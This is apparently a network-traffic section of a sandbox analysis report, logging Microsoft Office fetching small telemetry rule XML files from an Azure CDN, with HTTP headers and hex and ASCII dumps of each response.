                                                                                                                                            2024-10-31 16:13:05 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            48192.168.2.44980413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:05 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:05 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 427
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                            x-ms-request-id: 3601e2f9-501e-0064-27bd-2a1f54000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161305Z-17c5cb586f6wmhkn5q6fu8c5ss0000000980000000008m2x
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            49192.168.2.44980613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:05 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:05 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 423
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                            x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161305Z-16849878b787wpl5wqkt5731b40000000ad000000000v0bc
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:05 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            50192.168.2.44980713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:06 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:06 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 478
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                            x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161306Z-16849878b78g2m84h2v9sta29000000008hg00000000x74z
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:06 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            51192.168.2.44980813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:06 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:06 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:06 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 404
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                            x-ms-request-id: a783173c-501e-008c-2349-27cd39000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161306Z-16849878b78j5kdg3dndgqw0vg0000000bhg00000000431v
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:06 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            52192.168.2.44980913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:06 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:06 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 468
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                            ETag: "0x8DC582BB046B576"
                                                                                                                                            x-ms-request-id: f3394f62-601e-0070-07f3-2aa0c9000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161306Z-16849878b78wc6ln1zsrz6q9w800000009f0000000009kup
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:06 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            53192.168.2.44981013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:06 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:06 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 400
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                            ETag: "0x8DC582BB2D62837"
                                                                                                                                            x-ms-request-id: 128b4d9a-801e-00a3-1d55-2b7cfb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161306Z-15b8d89586fnfb49yv03rfgz1c00000001c000000000cwc2
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:06 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            54192.168.2.44981113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:06 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:07 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 479
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                            ETag: "0x8DC582BB7D702D0"
                                                                                                                                            x-ms-request-id: b2eb4648-201e-0051-526d-287340000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161307Z-17c5cb586f67hfgj2durhqcxk800000008pg00000000byrz
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:07 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            55192.168.2.44981213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:08 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:08 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 425
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                            x-ms-request-id: 2b9d96d3-301e-0020-4e31-276299000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161308Z-16849878b78fssff8btnns3b1400000009yg00000000sx04
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:08 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            56192.168.2.44981513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:08 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:08 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 448
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                            x-ms-request-id: 31f1d278-901e-0083-7b79-2bbb55000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161308Z-159b85dff8f9mtxchC1DFWf9vg000000013g000000009q07
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:08 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            57192.168.2.44981613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:08 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:08 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 416
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                            x-ms-request-id: a1cd263b-b01e-0070-5f2a-271cc0000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161308Z-16849878b78km6fmmkbenhx76n00000008z000000000y796
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
